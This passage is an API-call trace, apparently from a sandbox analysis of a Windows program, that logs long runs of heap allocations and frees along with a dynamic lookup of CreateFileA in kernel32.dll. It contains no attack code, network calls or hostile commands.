dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.049] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.049] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.049] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.049] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5a8 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898e0 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.050] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0035.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.052] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.054] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd48 [0035.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.055] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd48 [0035.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.055] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.056] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 